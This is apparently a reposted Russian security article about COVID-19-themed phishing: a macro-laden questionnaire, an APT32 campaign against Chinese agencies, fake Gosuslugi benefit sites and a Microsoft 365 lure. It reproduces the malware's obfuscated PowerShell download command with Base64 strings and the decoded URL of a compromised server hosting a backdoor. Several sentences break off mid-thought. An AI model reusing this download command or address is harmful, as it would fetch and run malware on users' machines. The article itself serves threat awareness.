Злоумышленники продолжают эксплуатировать тему COVID-19, создавая все новые и новые угрозы для пользователей, живо интересующихся всем, что касается эпидемии. В
Помните в
Бесплатный тест на COVID-19 не желаете?
Другой показательный пример фишинга на тему коронавируса был
Убедить большинство пользователей в необходимости включить макросы тоже было несложно. Для этого применялся стандартный трюк, когда для заполнения анкеты нужно сначала разрешить макросы, а значит — запустить скрипт VBA.
Как вы можете видеть, скрипт VBA специально маскируется от антивирусов.
В Windows есть функция ожидания, когда приложение ждет /T <секунд>, прежде чем принять ответ “Да” по умолчанию. В нашем случае скрипт ждал 65 секунд, прежде чем удалить временные файлы:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
А в процессе ожидания происходила загрузка вредоносного ПО. Для этого был запущен специальный скрипт PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
После декодирования значения Base64, скрипт PowerShell загружает бэкдор, находящийся на предварительно взломанном веб-сервере из Германии:
http://automatischer-staubsauger.com/feature/777777.png
и сохраняет его под именем:
C:UsersPublictmpdirfile1.exe
Dosar ‘C:UsersPublictmpdir’
удаляется при запуске файла ‘tmps1.bat’, который содержит команду cmd /c mkdir ""C:UsersPublictmpdir"".
Целевая атака на государственные структуры
Кроме этого недавно аналитики FireEye сообщили о целевой атаке APT32, направленной на правительственные структуры Уханя, а также Министерство Неотложной Помощи Китая (Chinese Ministry of Emergency Management). В одном из распотраняемых RTF содержалась ссылка на статью из New York Times под названием
Интересно, что на момент обнаружения ни один из антивирусов не детектировал этот экземпляр согласно данным Virustotal.
Когда официальные сайты “лежат”
Ярчайший пример фишинговой атаки случился в России буквально на днях. Поводом для этого стало назначение долгожданного пособия на детей в возрасте от 3 до 16 лет. Когда было объявлено о старте приема заявлений 12 мая 2020 года, миллионы рванули на сайт Госуслуги за долгожданной помощью и обрушили портал не хуже профессиональной DDoS-атаки. Когда президент сказал, что “Госуслуги не справились с потоком заявок”, в сети заговорили о том, что заработал альтернативный сайт приема заявлений.
Проблема заключается в том, что сайтов заработало сразу несколько, и пока один, настоящий по адресу posobie16.gosuslugi.ru действительно принимает заявления, еще
Коллеги из «СерчИнформ» нашли около 30 новых мошеннических доменов в зоне .ru. Infosecurity a Softline Company отследили более 70 подобных фейковых сайтов госуслуг с начала апреля. Их создатели манипулируют привычной символикой, а также используют комбинации из слов gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie и так далее.
Ажиотаж и социальная инженерия
Все эти примеры только подтверждают, что злоумышленники успешно монетизируют тематику коронавируса. И чем выше социальное напряжение и чем больше неясных вопросов, тем больше шансов у мошенников украсть важные данные, заставить людей самостоятельно отдать свои деньги или просто взломать побольше компьютеров.
А учитывая, что пандемия заставила потенциально не готовых к этому людей массово работать из дома, в зоне риска оказываются не только личные, но и корпоративные данные. Например, недавно пользователи Microsoft 365 (бывшего Office 365) также подверглись фишинговой атаке. Людям массово приходили голосовые “пропущенные” сообщения во вложениях к письмам. Однако фактически файлы представляли собой HTML-страницу, которая отправляла жертв атаки на
Sursa: www.habr.com